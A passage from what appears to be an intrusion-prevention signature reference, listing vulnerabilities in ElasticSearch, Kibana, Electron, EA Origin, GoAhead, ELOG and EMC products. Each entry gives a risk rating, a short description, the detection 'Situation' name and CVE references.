Software: ElasticSearch
Type: Input Validation
Description: There has been reported a local file inclusion vulnerability in Kibana. This vulnerability could be exploited by an authenticated attacker. Successful exploitation can lead in arbitrary code execution.
Situation: HTTP_CSU-Elastic-Kibana-Server.js-Local-File-Inclusion
References:
CVE-2018-17246
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17246
Back to top

Elastic-Kibana-Timelion-Prototype-Pollution

About this vulnerability: A vulnerability in Elastic Kibana
Risk: Moderate
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ElasticSearch
Type: Input Validation
Description: There exists a post-auth prototype pollution vulnerability in the Timelion visualizer component of Kibana. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-Elastic-Kibana-Timelion-Prototype-Pollution
References:
CVE-2019-7609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7609
Back to top

ElasticSearch-Dynamic-Scripting-Code-Execution

About this vulnerability: An ElasticSearch Dynamic Scripting Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ElasticSearch
Type: Input Validation
Description: A vulnerability in ElasticSearch, versions before 1.2, which allow remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search.
Situation: HTTP_CRL_ElasticSearch-Dynamic-Scripting-Code-Execution
References:
CVE-2014-3120
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3120
BID-67731
http://www.securityfocus.com/bid/67731
OSVDB-106949
http://www.osvdb.org/106949
Back to top

ElasticSearch-File-Discosure

About this vulnerability: An ElasticSearch File Discosure vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ElasticSearch
Type: Directory Traversal
Description: A vulnerability in ElasticSearch, versions before 1.6.1, which allows remote attackers to read arbitrary files via a directory traversal in the URI.
Situation: HTTP_CSU-ElasticSearch-File-Discosure
References:
CVE-2015-5531
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5531
Back to top

ElasticSearch-Memory-Disclosure

About this vulnerability: An attempt to exploit a vulnerability in Elasticsearch detected
Risk: High
First detected in: sgpkg-ips-1654-5242
Last changed: sgpkg-ips-1654-5242
Platform: Generic
Software: ElasticSearch
Type: Malfunction
Description: A vulnerability in Elasticsearch, versions 7.10.0 to 7.13.3, which allows remote attackers to send a malformed query and generate an error message containing previously used portions of a data buffer which could contain sensitive information such as Elasticsearch documents or authentication details.
Situation: HTTP_CRL-ElasticSearch-Memory-Disclosure
References:
CVE-2021-22145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22145
Back to top

ElasticSearch-Search-Groovy-Sandbox-Bypass

About this vulnerability: An ElasticSearch Search Groovy Sandbox Bypass vulnerability.
Risk: High
First detected in: sgpkg-ips-740-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ElasticSearch
Type: Insecure Configuration
Description: A vulnerability in ElasticSearch, versions before 1.3.8 and 1.4.x before 1.4.3, which allows remote attackers to bypass sandbox protection mechanisms and execute arbitrary shell commands via crafted scripts.
Situation: HTTP_CRL-ElasticSearch-Search-Groovy-Sandbox-Bypass
References:
CVE-2015-1427
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1427
Back to top

ElasticSearch-Throwableobjectinputstream-Insecure-Deserialization

About this vulnerability: A vulnerability in Elastic Elasticsearch
Risk: Moderate
First detected in: sgpkg-ips-994-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ElasticSearch
Type: Input Validation
Description: Insecure deserialization of untrusted ThrowableObjectInputStream data causes a code execution vulnerability in ElasticSearch. A successful attack can result in arbitrary code execution with the privileges of the affected java process.
Situation: Generic_SS-ElasticSearch-Throwableobjectinputstream-Insecure-Deserialization
References:
CVE-2015-5377
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5377
Back to top

Electro-Infection-Traffic

About this vulnerability: Electro infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1358-5242
Last changed: sgpkg-ips-1358-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Electro infection traffic was detected.
Situation: HTTP_CRL-Electro-Infection-Traffic
Back to top

Electron-Setasdefaultprotocolclient-Command-Injection

About this vulnerability: A vulnerability in Electronjs Electron
Risk: Moderate
First detected in: sgpkg-ips-1042-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Electronjs Electron
Type: Input Validation
Description: Improper validation of inputs causes a command injection vulnerability in Electron and applications built with it. A successful exploit allows an attacker to run arbitrary commands on the target system.
Situation: HTTP_SHS-Electron-Setasdefaultprotocolclient-Command-Injection
File-Text_Electron-Setasdefaultprotocolclient-Command-Injection
References:
CVE-2018-1000006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000006
Back to top

Electronic-Arts-Origin-Client-URI-Handler-Remote-Code-Execution

About this vulnerability: A vulnerability in Electronic Arts Origin
Risk: Moderate
First detected in: sgpkg-ips-1174-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Electronic Arts Origin
Type: Input Validation
Description: There has been reported a remote code execution vulnerability the Electronic Arts Origin Client. This vulnerability can be exploited by opening a malicious web page.
Situation: HTTP_SHS-Electronic-Arts-Origin-Client-URI-Handler-Remote-Code-Execution
File-Text_Electronic-Arts-Origin-Client-URI-Handler-Remote-Code-Execution
References:
CVE-2019-12828
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12828
Back to top

Electronic-Arts-Origin-Client-URI-Handler-Template-Injection

About this vulnerability: A vulnerability in Electronic Arts Origin
Risk: Moderate
First detected in: sgpkg-ips-1176-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Electronic Arts Origin
Type: Input Validation
Description: Improper validation of data in the title parameter in a origin2:// URI causes a template injection vulnerability in EA Origin. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: File-TextId_Electronic-Arts-Origin-Client-URI-Handler-Template-Injection
References:
CVE-2019-11354
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11354
Back to top

Electronic-Arts-SnoopyCtrl-ActiveX-Control-ControlFile-Buffer-Overflow

About this vulnerability: A vulnerability in Electronic Arts SnoopyCtrl ActiveX Control
Risk: High
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Electronic Arts SnoopyCtrl
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Electronic Arts SnoopyCtrl control. The vulnerability is due to a lack of input validation when handling arguments of various methods. A remote attacker can exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation allows arbitrary code injection and execution with the privileges of the currently logged in user.
Situation: HTTP_SS-Electronic-Arts-SnoopyCtrl-ActiveX-Control-Control-Buffer-Overflow
File-Text_Electronic-Arts-SnoopyCtrl-ActiveX-Control-Control-Buffer-Overflow
References:
CVE-2007-4466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4466
BID-25970
http://www.securityfocus.com/bid/25970
OSVDB-37723
http://www.osvdb.org/37723
Back to top

ElectronJS-Exodus-Wallet-Remote-Code-Execution

About this vulnerability: An ElectronJS Exodus Wallet Remote Code Execution Vulnerability
Risk: High
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Electronjs Electron
Type: Input Validation
Description: A vulnerability in ElectronJS, Exodus Wallet, versions 1.6.x, 1.7.x, 1.8.x, which allows remote attackers to execute arbitrary code via a specially crafted URL.
Situation: File-Text_ElectronJS-Exodus-Wallet-Remote-Code-Execution
References:
CVE-2018-1000006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000006
Back to top

elFinder-PHP-Connector-Exiftran-Command-Injection

About this vulnerability: A vulnerability in elFinder
Risk: High
First detected in: sgpkg-ips-1198-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: elFinder
Type: Input Validation
Description: A vulnerability in elFinder, versions before 2.1.48, which allows remote code execution through the PHP connector component, due to insufficient input validation.
Situation: HTTP_CS-elFinder-PHP-Connector-Exiftran-Command-Injection
References:
CVE-2019-9194
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9194
Back to top

Elipse-E3-ActiveReports-ActiveX-Vulnerability

About this vulnerability: A vulnerability in Elipse E3 ActiveReports
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Elipse E3 ActiveReports
Type: Malfunction
Description: There is a directory traversal vulnerability in Elipse E3 ActiveReports. The vulnerability is due to insufficient validation of parameters used in the SaveLayout() method in an ActiveX control. This can be exploited to write arbitrary files in the context of the currently logged-on user. A remote attacker could possibly exploit this vulnerability to achieve arbitrary code execution by enticing a target user to open a crafted web page.
Situation: File-Text_Elipse-E3-ActiveReports-ActiveX-Vulnerability
Back to top

Elm-Expires-Header-Field-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Elm's expires header field parsing
Risk: Moderate
First detected in: sgpkg-ips-36-1210
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: ELM
Type: Buffer Overflow
Description: ELM (Electronic Mail for UNIX) has a buffer overflow vulnerability in the parsing of the 'Expires:' header field. A remote attacker can exploit this vulnerability to execute arbitrary code on the victim machine.
Situation: E-Mail_HCS-Elm-Expires-Header-Field-Buffer-Overflow
References:
CVE-2005-2665
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2665
BID-14613
http://www.securityfocus.com/bid/14613
Back to top

Elog-Project-Elog-Retrieve_URL-Information-Disclosure

About this vulnerability: A vulnerability in ELOG Project ELOG
Risk: Moderate
First detected in: sgpkg-ips-1218-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ELOG
Type: Malfunction
Description: An information disclosure vulnerability has been reported in ELOG. This vulnerability is due to a design flaw in retrieve_url() when attempting to access externally located files that a user wishes to store. A remote, unauthenticated attacker could exploit this vulnerability by sending a malicious HTTP request to the target server. Successful exploitation will cause the ELOG server to disclose the password hash for a user.
Situation: HTTP_CSH-Elog-Project-Elog-Retrieve_URL-Information-Disclosure
References:
CVE-2019-3993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3993
Back to top

Elog-Project-Elog-Show_Uploader_JSON-Null-Pointer-Dereference

About this vulnerability: A vulnerability in ELOG Project ELOG
Risk: High
First detected in: sgpkg-ips-1216-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ELOG
Type: Malfunction
Description: A denial-of-service vulnerability has been reported in the ELOG. The vulnerability is due to a NULL pointer dereference while processing an upload HTTP request if the "drop-count" request parameter is missing in the request. A remote unauthenticated attacker could exploit this vulnerability by sending malicious HTTP request to a targeted server. Successful exploitation will cause the ELOG server to abnormally terminate.
Situation: HTTP_CRL-Elog-Project-Elog-Show_Uploader_JSON-Null-Pointer-Dereference
References:
CVE-2019-3995
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3995
Back to top

Elog-Web-Logbook-BOF

About this vulnerability: Buffer overflow in Elog Web logbook
Risk: High
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Elog Web Logbook
Type: Buffer Overflow
Description: Elog Web logbook is vulnerable to a heap-based buffer overflow. A remote attacker could exploit this vulnerability to execute arbitrary code on the server.
Situation: HTTP_CS-Elog-Web-Logbook-BOF
References:
CVE-2005-0439
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0439
BID-12556
http://www.securityfocus.com/bid/12556
OSVDB-13812
http://www.osvdb.org/13812
Back to top

Embedded-Object-In-HTML

About this vulnerability: External embedded object initialization in HTML
Risk: Low
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP client
Type: Malfunction
Description: It is possible to embed references to external objects in Hypertext Markup Language (HTML). While the use of these objects is completely normal in most cases, they may contain security vulnerabilities.
Situation: HTTP_SS-Embedded-ActiveX-Object-In-HTML
HTTP_SS-Embedded-Java-Applet-In-HTML
File-Text_Embedded-ActiveX-Object-In-HTML
File-Text_Embedded-Java-Applet-In-HTML
Back to top

Embedthis-GoAhead-Parseheaders-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in EmbedThis GoAhead
Risk: Moderate
First detected in: sgpkg-ips-1173-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EmbedThis GoAhead
Type: Input Validation
Description: There has been reported an out of bounds read vulnerability in EmbedThis GoAhead. This vulnerability could be exploited remotely. Successful exploitation can lead in denial of service conditions.
Situation: HTTP_CS-Embedthis-GoAhead-Parseheaders-Out-Of-Bounds-Read
References:
CVE-2019-12822
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12822
Back to top

Embedthis-GoAhead-Web-Server-Cgi-Remote-Code-Execution

About this vulnerability: A vulnerability in EmbedThis GoAhead
Risk: Moderate
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EmbedThis GoAhead
Type: Input Validation
Description: Improper validation of cgi-bin request parameters causes a remote code execution vulnerability in EmbedThis GoAhead. A successful exploitation allows an attacker to run arbitrary code on the target system.
Situation: HTTP_URI-Embedthis-GoAhead-Web-Server-Cgi-Remote-Code-Execution
References:
CVE-2017-17562
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17562
Back to top

Embedthis-GoAhead-Web-Server-CVE-2021-42342-Cgi-RCE

About this vulnerability: A vulnerability in EmbedThis GoAhead Web Server.
Risk: High
First detected in: sgpkg-ips-1427-5242
Last changed: sgpkg-ips-1427-5242
Platform: Generic
Software: EmbedThis GoAhead
Type: Input Validation
Description: A vulnerability in EmbedThis GoAhead Web Server, versions 4.x and 5.x prior to 5.1.5, which allows remote attackers to execute arbitrary code by sending a malicious request to the server, due to improper validation of user form variables passed to the file upload filter.
Situation: HTTP_CS-Embedthis-GoAhead-Web-Server-CVE-2021-42342-Cgi-RCE
References:
CVE-2021-42342
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42342
Back to top

Embedthis-GoAhead-Web-Server-File-Upload-Denial-Of-Service

About this vulnerability: A vulnerability in EmbedThis GoAhead
Risk: High
First detected in: sgpkg-ips-1243-5242
Last changed: sgpkg-ips-1355-5242
Platform: Generic
Software: EmbedThis GoAhead
Type: Infinite Loop
Description: A denial of service vulnerability has been reported in EmbedThis GoAhead Web Server. The vulnerability is due to an infinite loop when processing a request where the connection to the client is closed before the server has received all the expected data. The server may still be able to process other requests depending on the availability of resources. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted HTTP requests to the server and subsequently terminating the connections. Successful exploitation could lead to denial of service conditions.
Situation: HTTP_SLS-Embedthis-GoAhead-Web-Server-File-Upload-Denial-Of-Service
HTTP_CSH-Embedthis-GoAhead-Web-Server-File-Upload-Denial-Of-Service
References:
CVE-2019-5097
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5097
Back to top

Embedthis-GoAhead-Web-Server-File-Upload-Use-After-Free

About this vulnerability: A vulnerability in EmbedThis GoAhead
Risk: Moderate
First detected in: sgpkg-ips-1220-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EmbedThis GoAhead
Type: Malfunction
Description: There has been reported a pre-auth use-after-free vulnerability in EmbedThis GoAhead Web Server. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CS-Embedthis-GoAhead-Web-Server-File-Upload-Use-After-Free
References:
CVE-2019-5096
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5096
Back to top

EMC-Alphastor-3.1-Buffer-Overflow

About this vulnerability: EMC Alphastor 3.1 Stack Based Buffer Overflow
Risk: High
First detected in: sgpkg-ips-653-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: EMC AlphaStor
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in EMC AlphaStor 3.1, in the command line interface process of the server agent, which allows attackers to remotly execute arbitrary code via crafted TCP packets.
Situation: Generic_CS-EMC-Alphastor-3.1-Buffer-Overflow
References:
CVE-2008-2158
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2158
BID-29399
http://www.securityfocus.com/bid/29399
OSVDB-45714
http://www.osvdb.org/45714
Back to top

EMC-Alphastor-Device-Manager-0x41-Command-Buffer-Overflow

About this vulnerability: A vulnerability in EMC AlphaStor Device Manager
Risk: High
First detected in: sgpkg-ips-525-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC AlphaStor
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in EMC AlphaStor Device Manager (DCP). The vulnerability is due to insufficient boundary checks during creation of a device name. An unauthenticated attacker can exploit this vulnerability to cause denial of service or execute arbitrary code in the context of the affected service.
Situation: Generic_CS-EMC-Alphastor-Device-Manager-0x41-Command-Buffer-Overflow
References:
CVE-2013-0930
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0930
OSVDB-89436
http://www.osvdb.org/89436
Back to top

EMC-Alphastor-Device-Manager-Command-Injection

About this vulnerability: A vulnerability in EMC AlphaStor
Risk: Moderate
First detected in: sgpkg-ips-508-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC AlphaStor
Type: Input Validation
Description: There is a command injection vulnerability in EMC AlphaStor Device Manager. The vulnerability is caused by insufficient sanitization when processing certain Networker commands. An unauthenticated attacker can exploit this vulnerability to cause a denial of service or execute arbitrary commands in the context of the affected service.
Situation: Generic_CS-EMC-Alphastor-Device-Manager-Command-Injection
References:
CVE-2013-0928
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0928
BID-57472
http://www.securityfocus.com/bid/57472
OSVDB-89436
http://www.osvdb.org/89436
Back to top

EMC-Alphastor-Device-Manager-Format-String-Vulnerability

About this vulnerability: A vulnerability in EMC AlphaStor
Risk: High
First detected in: sgpkg-ips-508-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC AlphaStor
Type: Format String
Description: A format string vulnerability exists in EMC AlphaStor Device Manager. The vulnerability is caused by insufficient sanitization when processing certain requests. An unauthenticated attacker can exploit this vulnerability to cause a denial of service or execute arbitrary commands in the context of the affected service, which is System on Windows platforms.
Situation: Generic_CS-EMC-Alphastor-Device-Manager-Format-String-Vulnerability
References:
CVE-2013-0929
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0929
BID-57472
http://www.securityfocus.com/bid/57472
OSVDB-89435
http://www.osvdb.org/89435
Back to top

EMC-Alphastor-Library-Control-Program-Multiple-Buffer-Overflows

About this vulnerability: A vulnerability in EMC AlphaStor
Risk: Moderate
First detected in: sgpkg-ips-525-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC AlphaStor
Type: Buffer Overflow
Description: There are multiple buffer overflow vulnerabilities in EMC AlphaStor Library Control Program (LCP) while parsing remote requests. The vulnerabilities are due to missing bounds check while copying request data into fixed length stack buffers. A remote unauthenticated attacker can exploit these vulnerabilities to cause denial of service or execute arbitrary code in the context of the affected service.
Situation: Generic_CS-EMC-Alphastor-Library-Control-Program-Multiple-Buffer-Overflows
References:
CVE-2013-0946
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0946
BID-59794
http://www.securityfocus.com/bid/59794
OSVDB-93139
http://www.osvdb.org/93139
Back to top

EMC-Autostart-Error-Logging-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in EMC AutoStart
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC AutoStart
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in the Agent Service of EMC AutoStart. This vulnerability is caused by using user controlled string values as parameters to a format string function without proper boundary checking. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary code within the context of the affected service, which is SYSTEM on Windows platforms.
Situation: Generic_CS-EMC-Autostart-Error-Logging-Stack-Buffer-Overflow
References:
CVE-2011-2735
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2735
BID-49238
http://www.securityfocus.com/bid/49238
OSVDB-74597
http://www.osvdb.org/74597
Back to top

EMC-Autostart-Ftagent-Opcode-20-Multiple-Subcodes-Remote-Command-Execution

About this vulnerability: Vulnerabilities in EMC AutoStart
Risk: High
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC AutoStart
Type: Malfunction
Description: Multiple remote command execution vulnerabilities exist in EMC AutoStart. The vulnerabilities are due to insecure communication between the ftagent processes on nodes of an AutoStart cluster. A remote unauthenticated attacker can leverage these vulnerabilities by sending malicious requests to the ftagent process. Successful exploitation will result in execution of arbitrary commands with SYSTEM privileges on Windows platforms or root privileges on Unix-like systems.
Situation: Generic_CS-EMC-Autostart-Ftagent-Opcode-20-Subcode-2060-Remote-Command-Execution
Generic_CS-EMC-Autostart-Ftagent-Opcode-20-Subcode-2219-Remote-Command-Execution
Generic_CS-EMC-Autostart-Ftagent-Opcode-83-Subcode-22-SQL-Injection
References:
CVE-2015-0538
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0538
Back to top

EMC-Autostart-Ftagent-Opcode-85-Subcode-33-SQL-Injection

About this vulnerability: A vulnerability in EMC AutoStart
Risk: High
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC AutoStart
Type: Input Validation
Description: A remote SQL injection vulnerability exists in EMC AutoStart. The vulnerability is due to insufficient validation of remotely supplied data within the ftagent component. A remote unauthenticated attacker can leverage this vulnerability by sending malicious requests to the ftagent process. Successful exploitation will result in execution of arbitrary code with SYSTEM privileges on Windows platforms or root privileges on Unix-like systems.
Situation: Generic_CS-EMC-Autostart-Ftagent-Opcode-85-Subcode-33-SQL-Injection
References:
CVE-2015-0538
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0538
Back to top

EMC-Autostart-Ftagent.exe-Multiple-Integer-Overflow-Vulnerabilities

About this vulnerability: A vulnerability in EMC AutoStart
Risk: Moderate
First detected in: sgpkg-ips-473-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC AutoStart
Type: Integer Overflow
Description: Multiple buffer overflow vulnerabilities have been reported in EMC AutoStart. These vulnerabilities are caused by integer overflow errors while calculating heap buffer sizes. An unauthenticated, remote attacker can exploit this vulnerability to cause a denial of service or possibly execute arbitrary code within the context of the affected application, which is SYSTEM.
Situation: Generic_CS-EMC-Autostart-Ftagent.exe-Multiple-Integer-Overflow-Vulnerabilities
References:
CVE-2012-0409
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0409
BID-53682
http://www.securityfocus.com/bid/53682
OSVDB-82338
http://www.osvdb.org/82338
Back to top

EMC-Autostart-Ftagent.exe-Null-Byte-Write

About this vulnerability: A vulnerability in EMC AutoStart
Risk: High
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC AutoStart
Type: Malfunction
Description: There is a memory corruption vulnerability in EMC AutoStart. This vulnerability is caused by a failure to validate a user controlled value. This results in a Null byte write at a user controlled address. An unauthenticated, remote attacker can exploit this vulnerability to cause a denial of service or possibly execute arbitrary code within the context of the affected application, which is SYSTEM.
Situation: Generic_CS-EMC-Autostart-Ftagent.exe-Null-Byte-Write
References:
CVE-2012-0409
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0409
BID-53682
http://www.securityfocus.com/bid/53682
OSVDB-82338
http://www.osvdb.org/82338
Back to top

EMC-Captiva-PixTools-Distributed-Imaging-ActiveX-Control-File-Creation

About this vulnerability: An arbitrary file creation vulnerability in EMC Captiva PixTools
Risk: High
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: EMC Captiva PixTools
Type: Malfunction
Description: There is a vulnerability in an ActiveX control distributed within EMC Captiva PixTools. The vulnerability is due to unrestricted access to the "SetLogFileName" and "WriteToLog" methods, which attackers can exploit to create or overwrite arbitrary files on a target host and potentially execute malicious code by enticing a user to visit a maliciously crafted web page.
Situation: HTTP_SS-EMC-Captiva-PixTools-ActiveX-Control-File-Creation
File-Text_EMC-Captiva-PixTools-ActiveX-Control-File-Creation
References:
BID-36566
http://www.securityfocus.com/bid/36566
Back to top

EMC-Captiva-QuickScan-Pro-Keyhelp-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in EMC QuickScan Pro
Risk: High
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: EMC Captiva QuickScan Pro; EMC Documentum ApplicationXtender Desktop
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in EMC Captiva QuickScan Pro KeyHelp ActiveX control. The flaw is due to insufficient boundary checks on user-supplied input. A remote attack can exploit this vulnerability by enticing a target user to visit a maliciously crafted web page. A successful attack may lead to arbitrary code execution in the context of the current user.
Situation: HTTP_SS-EMC-Captiva-QuickScan-Pro-Keyhelp-ActiveX-Control-Buffer-Overflow
File-Text_EMC-Captiva-QuickScan-Pro-Keyhelp-ActiveX-Control-Buffer-Overflow
Back to top

EMC-Cmcne-Fileuploadcontroller-Arbitrary-File-Upload

About this vulnerability: A vulnerability in EMC Connectrix Manager Converged Network Edition
Risk: Moderate
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC Connectrix Manager
Type: Directory Traversal
Description: There is a code execution vulnerability in EMC Connectrix Manager Converged Network Edition. The vulnerability is due to lack of authentication and insufficient input validation in the FileUploadController servlet of http-file-upload.war when processing HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.
Situation: HTTP_CS-ENC-Cmcne-Fileuploadcontroller-Arbitrary-File-Upload
References:
CVE-2013-6810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6810
OSVDB-101195
http://www.osvdb.org/101195
Back to top

EMC-Cmcne-Fileuploadcontroller-Information-Disclosure

About this vulnerability: A vulnerability in EMC Connectrix Manager Converged Network Edition
Risk: Moderate
First detected in: sgpkg-ips-572-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC Connectrix Manager
Type: Input Validation
Description: An information disclosure vulnerability exists in EMC Connectrix Manager Converged Network Edition. The vulnerability is due to insufficient input validation in the FileUploadController servlet when processing certain HTTP requests. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. In a successful attack scenario, the attacker can disclose the contents of arbitrary files on the local filesystem.
Situation: HTTP_CS-EMC-Cmcne-Fileuploadcontroller-Information-Disclosure
References:
CVE-2014-2276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2276
BID-66308
http://www.securityfocus.com/bid/66308
OSVDB-104671
http://www.osvdb.org/104671
Back to top

EMC-Cmcne-Inmservlets-Bootfileuploadmoreinfoservlet-Directory-Traversal

About this vulnerability: A vulnerability in EMC Connectrix Manager Converged Network Edition
Risk: Moderate
First detected in: sgpkg-ips-563-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC Connectrix Manager
Type: Directory Traversal
Description: A directory traversal vulnerability exists in EMC Connectrix Manager Converged Network Edition. The vulnerability is due to lack of authentication and insufficient input validation in the BootFileUploadMoreInfoServlet servlet of inmservlets.war when processing HTTP requests. A remote unauthenticated attacker can copy any files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.
Situation: HTTP_CRL-EMC-Cmcne-Inmservlets-Bootfileuploadmoreinfoservlet-Directory-Traversal
References:
CVE-2013-6810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6810
OSVDB-100899
http://www.osvdb.org/100899
Back to top

EMC-Cmcne-Inmservlets-CSV-Information-Disclosure

About this vulnerability: A vulnerability in EMC Connectrix Manager Converged Network Edition
Risk: Moderate
First detected in: sgpkg-ips-562-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC Connectrix Manager
Type: Directory Traversal
Description: There is an information disclosure vulnerability in EMC Connectrix Manager Converged Network Edition. The vulnerability is due to lack of authentication and insufficient input validation in the csv_page.jsp page of inmservlets.war when processing HTTP requests. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to view the contents of arbitrary files on a target system.
Situation: HTTP_CSU-EMC-Cmcne-Inmservlets-CSV-Information-Disclosure
References:
CVE-2013-6810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6810
OSVDB-101210
http://www.osvdb.org/101210
Back to top

EMC-Cmcne-Inmservlets-Unifiedfileuploadmoreinfoservlet-Directory-Traversal

About this vulnerability: A vulnerability in EMC Connectrix Manager Converged Network Edition
Risk: Moderate
First detected in: sgpkg-ips-563-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC Connectrix Manager
Type: Directory Traversal
Description: A directory traversal vulnerability exists in EMC Connectrix Manager Converged Network Edition. The vulnerability is due to lack of authentication and insufficient input validation in the UnifiedFileUploadMoreInfoServlet of inmservlets.war when processing HTTP requests. A remote unauthenticated attacker can copy any files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.
Situation: HTTP_CSU-EMC-Cmcne-Inmservlets.war-Unifiedfileuploadmoreinfoservlet-Directory-Traversal
References:
CVE-2013-6810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6810
OSVDB-101209
http://www.osvdb.org/101209
Back to top

